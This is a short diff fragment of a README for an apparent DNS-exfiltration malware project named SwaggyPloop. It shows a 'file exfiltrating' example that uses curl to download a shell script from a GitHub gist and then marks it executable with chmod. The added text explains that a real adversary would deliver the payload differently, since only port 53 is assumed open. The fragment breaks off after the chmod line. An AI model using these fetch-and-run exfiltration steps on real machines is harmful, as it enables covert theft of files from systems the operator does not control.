ColdSauce/SwaggyPloop/README.md

 ### Exfiltrating a file example (will send to our default DNS server)
+The curl in this case is here just for convenience.
+In a real-world scenario, an adversary would introduce the payload in a different way as we are assuming only port 53 and a few others are open on the machine (curl wouldn't work in that case).
+But the goal of this project was to talk about the malware itself rather than the introduction of the malware onto the system.
 ```
 curl https://gist.githubusercontent.com/ColdSauce/a1ff11090994bd6e0c6731dcb407ba7a/raw/9d1456301d493dde762aa0aa7e6cac16e6da6e37/one_file.sh > one_file.sh
 chmod +x one_file.sh